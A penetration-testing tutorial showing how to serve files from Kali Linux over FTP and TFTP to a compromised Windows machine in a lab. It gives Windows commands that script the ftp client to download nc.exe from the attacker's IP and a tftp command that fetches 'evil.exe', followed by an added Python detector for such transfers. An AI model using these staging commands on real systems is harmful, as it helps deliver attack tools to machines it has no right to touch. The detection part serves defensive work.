
Post exploitation, moving files from Kali Linux to a remote victim machine can be critical to the next steps. Privilege escalation can be made significantly easier by automatic exploit suggesters and other useful binaries and scripts. But what happens when you can't use wget on the victim machine, or when the only attack surface is a web application that is vulnerable to SQL-injected ftp commands? This is the Post-Exploit Guide: Use FTP in Kali Linux to Move Files.

  • Use pureFTPd
  • Use Metasploit’s FTP server module
  • Use Python’s pyftpdlib
  • Use Kali’s atftpd Trivial FTP Server

Here’s What You Need

  • Kali Linux Virtual Machine (VirtualBox)
  • Windows Client (VirtualBox)

How you serve up files can depend on what's available on the remote host. Living off the land is the way to live in the world of ethical hacking. It so happens that the ftp client comes installed by default on Windows. Using it to get files from whatever is running on the Kali machine is the part that takes some engineering.

That is why I use the tools already installed on Windows whenever possible. On Windows XP machines trivial ftp is installed by default and is called with tftp in a terminal. The benefit is that it is non-interactive, which makes it easier to use remotely when dealing with authentication, even as an anonymous user with read access.

Setting up the virtual machines in VirtualBox requires a few easy steps. My usual setup involves creating a host-only network adapter with the DHCP server enabled. Additionally, I attach a NAT network adapter, which I can switch to when I need internet access.

[Screenshots: host-only network adapter settings, parts 1/2 and 2/2]

Python’s pyftpdlib Module

Just as I can run a simple HTTP server using the syntax python -m SimpleHTTPServer [serving-port], the same approach works for the pyftpdlib FTP module. In the same vein, any files I want to serve up via FTP are served from the directory I run the module from.

# install the module
apt-get install python-pyftpdlib 

# start the server on port 21
python -m pyftpdlib -p 21

By default anonymous access is allowed by the new Python FTP server. Additionally adding the -w flag grants anonymous users write access.

See how the ftp server is running now and serving up files!
Running a dir lists the available files being served by Kali.

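The problem is that the Windows ftp client is interactive, and that makes passive exploiting difficult. The way around it is to echo the ftp commands into a script file and run the client against that file.

rem write the ftp commands to a script file, one per line
echo open 10.0.2.17 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo binary >> ftp.txt
echo get nc.exe >> ftp.txt
echo bye >> ftp.txt
rem -n suppresses auto-login so the USER line in the script is used
ftp -n -s:ftp.txt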

Metasploit FTP Server Module

$ msfconsole
msf > use auxiliary/server/ftp
msf > set SRVHOST 10.0.2.17
msf > set FTPROOT /dir-where-files-are
msf > run

Running the Metasploit ftp server binds the service to port 21 as a background job, so to kill it run jobs -k [job id].


Here’s what the request looks like in Wireshark.

PureFTPd

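I found an excellent guide for using the pureFTPd service from FuzzySecurity.

$ apt-get install pure-ftpd
$ groupadd ftpusers
$ useradd -g ftpusers -d /dev/null -s /etc ftp-user
$ mkdir /root/ftp
# create the virtual user bob (prompts for a password), mapped to ftp-user
$ pure-pw useradd bob -u ftp-user -g ftpusers -d /root/ftp/
# build the PureDB database from the virtual user file
$ pure-pw mkdb
$ chown -R ftp-user:ftpusers /root/ftp
# enable PureDB authentication
$ cd /etc/pure-ftpd/auth
$ ln -s ../conf/PureDB 60pdb
# restart the service so the changes take effect
$ /etc/init.d/pure-ftpd restart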

Windows TFTP Client

By default the tftp client is installed in Windows Vista and above, but it needs to be enabled. Go to Control Panel > Programs and Features > Turn Windows features on or off to turn on the TFTP client.

Now on the Kali machine I need to start up the atftpd service.

# start the service
$ service atftpd start

# create dir to serve payload
$ mkdir /tftphome

# need to change some config settings (on Debian-based systems the file is /etc/default/atftpd)
$ nano /etc/default/atftpd

# restart the service
$ /etc/init.d/atftpd restart

And finally, on the Windows client, run this.

C:\> tftp -i 10.0.2.17 GET evil.exe
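
From the defender's side, both Windows-side transfers in this guide (the echo-built script run with ftp -s: and the tftp -i GET) leave recognisable process command lines. The following is an added example, not part of the original post, that flags them in process-creation telemetry; the sample command lines are constructed, and the input format (one command line per event, in time order) is an assumption.

```python
import re

# Constructed sample command lines, as they might appear in process-creation
# logs (e.g. Sysmon Event ID 1 or Security 4688 with command-line auditing).
SAMPLE_CMDLINES = [
    r'cmd.exe /c echo open 10.0.2.17 > ftp.txt',
    r'cmd.exe /c echo USER anonymous >> ftp.txt',
    r'cmd.exe /c echo get nc.exe >> ftp.txt',
    r'ftp.exe -n -s:ftp.txt',
    r'C:\Windows\System32\tftp.exe -i 10.0.2.17 GET evil.exe',
    r'ftp.exe ftp.example.com',                      # interactive use, not flagged
    r'cmd.exe /c echo build finished >> build.log',  # benign echo redirect
]

# echo of an FTP verb redirected into a file; group 1 is the file name
ECHO_FTP = re.compile(
    r'\becho\s+(?:open\s+\S+|user\s+\S+|(?:get|put)\s+\S+|bin(?:ary)?|bye)'
    r'\s*>>?\s*(\S+)', re.I)
# ftp client started with a command script; group 1 is the script name
FTP_SCRIPT = re.compile(
    r'(?:^|[\\\s"])ftp(?:\.exe)?"?\s+(?:\S+\s+)*?[-/]s:(\S+)', re.I)
# tftp client download; group 1 is the server, group 2 the file
TFTP_GET = re.compile(
    r'(?:^|[\\\s"])tftp(?:\.exe)?"?\s+(?:-i\s+)?(\S+)\s+get\s+(\S+)', re.I)

def detect(cmdlines):
    """Return (rule, severity, detail) tuples for scripted FTP/TFTP downloads."""
    staged = {}    # script file name -> count of FTP verbs echoed into it
    findings = []
    for line in cmdlines:
        if m := ECHO_FTP.search(line):
            name = m.group(1).lower()
            staged[name] = staged.get(name, 0) + 1
        elif m := FTP_SCRIPT.search(line):
            name = m.group(1).lower()
            # Script assembled line by line just before use: stronger signal.
            sev = "high" if staged.get(name, 0) >= 2 else "medium"
            findings.append(("ftp_scripted", sev, name))
        elif m := TFTP_GET.search(line):
            findings.append(("tftp_get", "medium",
                             f"{m.group(2)} from {m.group(1)}"))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_CMDLINES):
        print(finding)
```

The severity split is a tuning choice: ftp -s: on its own is used by legitimate batch jobs, while a script assembled with echo immediately beforehand is far less common.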

Conclusion:

I showed how to serve up files from a Kali Linux virtual machine using several methods, including Python’s pyftpdlib, the pureFTPd service, and Metasploit’s built-in ftp server. The way to choose between these options is to identify the one that allows anonymous access. This is critical in getting remote ftp commands to execute flawlessly in an interactive ftp client, such as the one installed by default on Windows.
